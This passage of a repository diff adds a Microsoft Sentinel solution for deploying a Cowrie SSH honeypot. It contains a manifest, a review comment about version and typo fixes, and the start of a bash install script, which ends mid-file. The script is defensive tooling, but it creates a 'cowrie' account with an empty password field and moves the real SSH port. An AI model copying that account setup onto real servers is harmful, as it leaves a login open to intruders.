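"query - 7" are each used twice.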
@@ -0,0 +1,27 @@
+{
+ "Name": "Sensor SSH Cowrie",
+ "Author": "Microsoft - support@microsoft.com",
+ "Logo": "",
+ "Description": "The Sensor SSH Cowrie solution for Microsoft Sentinel enables you to deploy a Azure VM for as a HoneyPot for private internal detection tripwire capabilitties or deploy publicly on the internet for threat intellegence gathering.\r\n\r\n **Underlying Technologies used:** \r\n\r\n This solution takes a dependency on the following technologies, and some of these dependencies might result in additional ingestion or operational costs:\r\n\n a. [Cowrie](https://cowrie.readthedocs.io/en/latest/)\r\n\n",
+ "Data Connectors": [
+ "Data Connectors/Microsoft-SSHCowrieSensor.json"
+ ],
+ "Workbooks": [
+ "Workbooks/Cowrie.json"
+ ],
+ "Analytic Rules": [
+ "Analytic Rules/DetectSuspiciousFileDownloads.yaml",
+ "Analytic Rules/MonitorUnusualFileExecution.yaml",
+ "Analytic Rules/DetectFileUploadsandDownloads.yaml",
+ "Analytic Rules/DetectConnectionEvents.yaml",
+ "Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml"
+ ],
+ "Parsers": [
+ "Parsers/CowrieEvents.yaml"
+ ],
+ "Metadata": "SolutionMetadata.json",
+ "BasePath": "C:\\GitHub\\Azure-Sentinel\\Solutions\\Sensor SSH Cowrie",
+ "Version": "3.0.0",
+ "TemplateSpec": true,
+ "Is1PConnector": false
+}
\ No newline at end of file
diff --git a/Solutions/Sensor SSH Cowrie/scripts/script.sh b/Solutions/Sensor SSH Cowrie/scripts/script.sh
new file mode 100644
index 00000000000..46ef0f309c5
--- /dev/null
+++ b/Solutions/Sensor SSH Cowrie/scripts/script.sh
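Review bot: `"Version": "3.0.0"` in data/Solution_Cowrie.json does not match the 1.0.0 recorded in ReleaseNotes.md in this same change; pick one so the packaged solution version and the release notes agree. The Description is shown to users as written and has several typos: `deploy a Azure VM for as a HoneyPot` reads better as `deploy an Azure VM as a honeypot`, `capabilitties` → `capabilities`, `intellegence` → `intelligence`. `"BasePath"` is a contributor's local Windows path; that appears to be the convention for these data files in this repo, but it is worth confirming it is what the packaging tooling expects rather than something that should be left out.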
@@ -0,0 +1,67 @@
+#!/bin/bash
+
+# Update and install dependencies
+sudo apt-get update
+sudo apt-get install -y git python3 python3-venv python3-dev libssl-dev libffi-dev build-essential
+
+#Backup the current SSH configuration file
+sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
+#Change the SSH port to 22222
+sudo sed -i 's/^#Port 22/Port 22222/' /etc/ssh/sshd_config
+#Restart the SSH service to apply changes
+sudo systemctl restart ssh.service
+echo "SSH port changed to 22222 and SSH service restarted."
+
+# Create a cowrie user without a password
+sudo useradd -m -s /bin/bash -c "Cowrie" -p "" cowrie
+
+# Switch to the cowrie user and set up the environment
+sudo -u cowrie bash << EOF
+cd /home/cowrie
+git clone https://github.com/cowrie/cowrie.git
+cd cowrie
+python3 -m venv cowrie-env
+source cowrie-env/bin/activate
+pip install --upgrade pip
+pip install -r requirements.txt
+cp etc/cowrie.cfg.dist etc/cowrie.cfg
+cp etc/userdb.example etc/userdb.txt
+bin/cowrie start
+EOF
+
+# Create the systemd service file for cowrie
+#cat <